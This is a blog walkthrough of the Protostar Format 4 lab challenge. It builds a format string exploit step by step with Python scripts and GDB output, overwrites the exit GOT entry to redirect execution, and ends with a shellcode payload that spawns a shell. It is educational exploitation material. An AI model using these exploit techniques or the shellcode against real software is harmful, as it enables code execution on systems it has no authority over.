Protostar Format 4 Walkthrough

Airman
11 min readApr 22, 2018

Let’s tackle the Protostar Format 4 challenge from Exploit Exercises (https://exploit-exercises.com/protostar/format4/). This is a detailed step-by-step walkthrough explaining all the tools and techniques needed — we’ll be writing a format string exploit.

Format 4 Challenge

Here’s the source code for the challenge, format4.c:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int target;void hello()
{
printf("code execution redirected! you win\n");
_exit(1);
}
void vuln()
{
char buffer[512];
fgets(buffer, sizeof(buffer), stdin); printf(buffer); exit(1);
}
int main(int argc, char **argv)
{
vuln();
}

The program reads a string from the standard input and passes it to printf. We need to craft a string that will cause a call to hello().

Exploring the Stack

First thing we’ll do is try to explore the stack of the program when printf is called. Let’s open format4 in GDB:

user@protostar:/opt/protostar/bin$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) set disassembly-flavor intel
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>info registers
>x/1i $eip
>x/32x $esp
>end
(gdb) set pagination off

To start with, I configure some creature comforts so that GDB displays registers, current CPU instruction, and contents of the stack each time a breakpoint is reached (as I finished writing I realized these are not really needed, but I left them here anyways). I explain these in a bit more detail in the Stack 7 walkthrough: https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0. Now let’s run it and play with the input:

(gdb) run
Starting program: /opt/protostar/bin/format4
ABCDEF
ABCDEF
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.
(gdb) run
Starting program: /opt/protostar/bin/format4
%p
0x200
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.
(gdb) run
Starting program: /opt/protostar/bin/format4
%p%p%p%p
0x2000xb7fd84200xbffff5f40x70257025
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.
(gdb) run
Starting program: /opt/protostar/bin/format4
AAAA|%p|%p|%p|%p|%p|%p|%p|%p|%p|%p
AAAA|0x200|0xb7fd8420|0xbffff5f4|0x41414141|0x7c70257c|0x257c7025|0x70257c70|0x7c70257c|0x257c7025|0x70257c70
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.

Interesting. If we pass a plain string, we get the same string as output. If we use one of the printf format specifiers, such as %p, printf will interpret it and expect additional parameters. There’s no additional parameters provided, but it will still pick values from the stack and use them. %p tells printf to interpret the next parameter as 4 byte (on 32 bit systems) pointer (i.e. memory address) and print it in hex. We add | as a divider, and also place a pattern AAAA at the beginning of the string that we can easily recognize. It looks like the string we pass to stdin is located on the stack, and so instructing printf to inspect the stack we found it (highlighted). This makes sense, buffer is a local variable in vuln() and so it is located on the stack during execution. See my Stack 7 walkthrough (link above) for more info on stack workings and layout.

Reading Arbitrary Program Memory

OK, let’s start crafting our exploit, and we’ll start with exploring the program memory:

#!/usr/bin/pythonimport structbuf = ''
buf += 'AAAA'
buf += '|%p'*10
print(buf)

Our starting point is the same string we used before. Run the exploit:

user@protostar:~$ ./format4.py >/tmp/f4

Back in GDB:

(gdb) run </tmp/f4
Starting program: /opt/protostar/bin/format4 </tmp/f4
AAAA|0x200|0xb7fd8420|0xbffff5f4|0x41414141|0x7c70257c|0x257c7025|0x70257c70|0x7c70257c|0x257c7025|0x70257c70
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.

We see that the beginning of the string can be found on the stack in the fourth “parameter” to printf. Let’s find a string in memory we’d like to display:

(gdb) disas hello
Dump of assembler code for function hello:
0x080484b4 <hello+0>: push ebp
0x080484b5 <hello+1>: mov ebp,esp
0x080484b7 <hello+3>: sub esp,0x18
0x080484ba <hello+6>: mov DWORD PTR [esp],0x80485f0
0x080484c1 <hello+13>: call 0x80483dc <puts@plt>
0x080484c6 <hello+18>: mov DWORD PTR [esp],0x1
0x080484cd <hello+25>: call 0x80483bc <_exit@plt>
End of assembler dump.
(gdb) x/s 0x80485f0
0x80485f0: "code execution redirected! you win"

We see that memory at address 0x80485f0 contains string “code execution redirected! you win”. Let’s trick the program into displaying it! All we need to do is change AAAA to the address of the string and change fourth %p to %s — the address we provide will be interpreted as the location of the NULL terminated string, which will be printed. Here’s the modified exploit:

#!/usr/bin/pythonimport structbuf = ''
buf += struct.pack('I', 0x80485f0)
buf += '|%p'*3
buf += '|%s'
buf += '|%p'*6
print(buf)

And now run it (run the exploit first and redirect output to /tmp/f4):

(gdb) run </tmp/f4
Starting program: /opt/protostar/bin/format4 </tmp/f4
|0x200|0xb7fd8420|0xbffff5f4|code execution redirected! you win|0x7c70257c|0x257c7025|0x73257c70|0x7c70257c|0x257c7025|0x70257c70
Program exited with code 01.
Error while running hook_stop:
The program has no registers now.

It works!

Modifying Memory With printf

So far so good, but we only learned how to explore the contents of the memory. How is it even possible to hijack execution flow of the program with printf, doesn’t it just print stuff to the standard output? If we check man page for printf (the C function, not a command, i.e. man 3 printf), we find this gem in the BUGS section:

Code  such  as  printf(foo); often indicates a bug, since foo may contain a % character.  If foo comes from untrusted user input, it may contain %n, causing the printf() call to write to memory and creating a security hole.

“Write to memory” sounds promising, let’s check what %n does:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument.  No argument is converted.

So, printf(“AAAA%n”, &n_char) will print AAAA to the standard output and then will store 4 in n_char variable. We can pass any memory address instead of &n_char as we control stack through the standard input. Excellent!

Let’s try to write 0x41 to the target variable. Find its memory address first:

(gdb) break main
Breakpoint 10 at 0x804851a: file format4/format4.c, line 27.
(gdb) run
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0xd63131a5 -701419099
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0xfc66e7b5 0xd63131a5 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4
Breakpoint 10, main (argc=1, argv=0xbffff874) at format4/format4.c:27
27 in format4/format4.c
(gdb) p target
$9 = 0
(gdb) p &target
$10 = (int *) 0x804973c

We see that the value of target is 0 and that it’s located at 0x804973c. Let’s use it:

#!/usr/bin/pythonimport structbuf = ''
buf += struct.pack('I', 0x804973c)
buf += '|%p|'*3
# junk to make printf output 0x41 characters
buf += 'A'*(0x41-len(buf))
# this is where printf will write 0x41 to 0x80485f0
buf += '%n'
print(buf)

Run it in GDB (remember to run the script first and save it’s output to /tmp/f4):

(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) break *0x0804850f
Breakpoint 11 at 0x804850f: file format4/format4.c, line 22.
(gdb) run </tmp/f4
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0x1cbc0fd9 482086873
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0x36ebd9c9 0x1cbc0fd9 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4
Breakpoint 10, main (argc=1, argv=0xbffff874) at format4/format4.c:27
27 in format4/format4.c
(gdb) p target
$11 = 0
(gdb) c
Continuing.
<|0x200||0xb7fd8420||0xbffff5f4|AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
eax 0x55 85
ecx 0x0 0
edx 0xb7fd9340 -1208118464
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff5a0 0xbffff5a0
ebp 0xbffff7b8 0xbffff7b8
esi 0x0 0
edi 0x0 0
eip 0x804850f 0x804850f <vuln+61>
eflags 0x200292 [ AF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804850f <vuln+61>: call 0x80483ec <exit@plt>
0xbffff5a0: 0x00000001 0x00000200 0xb7fd8420 0xbffff5f4
0xbffff5b0: 0x0804973c 0x7c70257c 0x7c70257c 0x7c70257c
0xbffff5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5f0: 0x0a6e2541 0xb7ffef00 0xb7fed24f 0xb7ffe000
0xbffff600: 0x00001000 0x00000001 0xb7ffeff4 0x00000000
0xbffff610: 0xbffff6bc 0xb7fed61f 0xb7fffab0 0xb7fe1d68
Breakpoint 11, 0x0804850f in vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) p target
$12 = 84
(gdb) p/x target
$13 = 0x54

We set a second breakpoint in vuln after printf and start the program. At the beginning on main the value of target is 0. After the printf it is 0x54. The good news is we’ve managed to change it. The bad news is, it’s not the expected 0x41. What happened here is that we used the length of the buffer in our calculations, but the printf would output a hex value (like 0xb7fd8420) instead of the %p characters in the string.

This brings us to the first trick we’ll use, which is the parameter field modifier. It allows us to reference subsequent printf arguments, without using the prior arguments: printf(“%4$d”, 1, 2, 3, 4, 5) will print 4. This is just the thing we need to reference the memory address we plant in the stack, without using any of the %p to iterate through the stack values we don’t need. Here’s our modified exploit to overwrite target:

#!/usr/bin/pythonimport structbuf = ''
buf += struct.pack('I', 0x804973c)
# junk to make printf output 0x41 characters
buf += 'A'*(0x41-len(buf))
# this is where printf will write 0x41 to 0x80485f0
buf += '%4$n'
print(buf)

And run it in GDB:

(gdb) run </tmp/f4
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/format4 </tmp/f4
eax 0xbffff874 -1073743756
ecx 0xdb1dea4c -618796468
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7c0 0xbffff7c0
ebp 0xbffff7c8 0xbffff7c8
esi 0x0 0
edi 0x0 0
eip 0x804851a 0x804851a <main+6>
eflags 0x200286 [ PF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804851a <main+6>: call 0x80484d2 <vuln>
0xbffff7c0: 0x08048540 0x00000000 0xbffff848 0xb7eadc76
0xbffff7d0: 0x00000001 0xbffff874 0xbffff87c 0xb7fe1848
0xbffff7e0: 0xbffff830 0xffffffff 0xb7ffeff4 0x080482b3
0xbffff7f0: 0x00000001 0xbffff830 0xb7ff0626 0xb7fffab0
0xbffff800: 0xb7fe1b28 0xb7fd7ff4 0x00000000 0x00000000
0xbffff810: 0xbffff848 0xf14a3c5c 0xdb1dea4c 0x00000000
0xbffff820: 0x00000000 0x00000000 0x00000001 0x08048400
0xbffff830: 0x00000000 0xb7ff6210 0xb7eadb9b 0xb7ffeff4
Breakpoint 10, main (argc=1, argv=0xbffff874) at format4/format4.c:27
27 in format4/format4.c
(gdb) p target
$14 = 0
(gdb) c
Continuing.
<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
eax 0x42 66
ecx 0x1 1
edx 0xb7fd9340 -1208118464
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff5a0 0xbffff5a0
ebp 0xbffff7b8 0xbffff7b8
esi 0x0 0
edi 0x0 0
eip 0x804850f 0x804850f <vuln+61>
eflags 0x200292 [ AF SF IF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
0x804850f <vuln+61>: call 0x80483ec <exit@plt>
0xbffff5a0: 0x00000001 0x00000200 0xb7fd8420 0xbffff5f4
0xbffff5b0: 0x0804973c 0x41414141 0x41414141 0x41414141
0xbffff5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff5f0: 0x24342541 0xb7000a6e 0xb7fed24f 0xb7ffe000
0xbffff600: 0x00001000 0x00000001 0xb7ffeff4 0x00000000
0xbffff610: 0xbffff6bc 0xb7fed61f 0xb7fffab0 0xb7fe1d68
Breakpoint 11, 0x0804850f in vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) p/x target
$16 = 0x41

It works perfectly now.

The second trick we’ll need for this exploit is the “length modifier” for the printf parameters. If we wanted to write, say, 0x0804abcd to some memory address using %n, we would need to print 134,523,853 characters (converted form hex). That’s a lot! But if we use %hn use instead, it tells printf to treat the parameter as short int, i.e. 2 bytes. So instead of doing one write of 0x0804abcd, we can two separate writes of 0x0804 and 0xabcd, for which we would need printf to output 43,981 characters (0xabcd in decimal). Also, we can see that the length of the buffer is 512 bytes, so we cannot just pass a long string to output all of those characters, so we’ll also use field width format string modifier (a number we can put right after %). As an example, printf(“%500d”, 5) will print 499 spaces followed by the number 5 — 500 characters in all.

We also notice that exit() is called right after printf() in vuln(), which would make is useless if we overwrite the return address for vuln. So our third trick would be to overwrite the address for exit() in the Global Offset Table (GOT). This will also make the exploit more reliable as we don’t need to guess the correct location of the return address on the stack. See my Heap 3 walkthrough for more info on GOT: https://medium.com/@airman604/protostar-heap-3-walkthrough-56d9334bcd13

The Exploit

Our plan is clear now, we’ll use the input string to plant the addresses of the higher and lower halfs of the exit pointer in GOT, we’ll print the required number of characters and will use %hn twice to overwrite the address of exit in GOT with the address of hello().

Let’s find all the needed addresses:

(gdb) p hello
$17 = {void (void)} 0x80484b4 <hello>
(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) x/3i 0x80483ec
0x80483ec <exit@plt>: jmp DWORD PTR ds:0x8049724
0x80483f2 <exit@plt+6>: push 0x30
0x80483f7 <exit@plt+11>: jmp 0x804837c

So we need to overwrite the memory at 0x08049724 with 0x080484b4. Let’s put it all together:

#!/usr/bin/pythonimport structgot_exit = 0x8049724
got_exit_high = got_exit + 2
hello = 0x080484b4
hello_low = hello & 0xffff
hello_high = hello >> 16
buf = ''
buf += struct.pack('I', got_exit_high)
buf += struct.pack('I', got_exit)
# write the high part first
# we already wrote 8 bytes - the 2 memory addresses
buf += '%2044p' # 0x804-8 = 2044
buf += '%4$hn'
# write the low part now
buf += '%31920p' # 0x84b4-0x804 = 31920
buf += '%5$hn'
print(buf)

And it works when we run it as:

user@protostar:/opt/protostar/bin$ ~/format4.py | ./format4
&$
<snip>
code execution redirected! you win

Where’s My Shellz?

Without much explanation, here’s a modified exploit that executes a shell. 0xbffff5d0 is approximately the address of all the NOPs (\x90) we add to the buffer and we’re trying to jump to about the middle of the nopsled to get to the shellcode I’ve also added:

#!/usr/bin/pythonimport structgot_exit = 0x8049724
got_exit_high = got_exit + 2
# hello = 0x080484b4
hello = 0xbffff5d0 + 200
hello_low = hello & 0xffff
hello_high = hello >> 16
buf = ''
buf += struct.pack('I', got_exit_high)
buf += struct.pack('I', got_exit)
# write the high part first
# we already wrote 8 bytes - the 2 memory addresses
buf += '%' + str(hello_high-len(buf)) + 'p'
buf += '%4$hn'
# write the low part now
buf += '%' + str(hello_low-hello_high) + 'p'
buf += '%5$hn'
buf += '\x90'*300
buf += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
buf += "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
print(buf)

This should be executed as:

user@protostar:/opt/protostar/bin$ (~/format4_shell.py; cat) | ./format4

For more info on nopsled and the (…; cat) | … trick, see my Stack 7 walkthrough.

References

LiveOverflow Binary Hacking course — https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN

My Protostar Stack 7 walkthrough: https://medium.com/@airman604/protostar-stack7-walkthrough-2aa2428be3e0

--

--

Airman

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.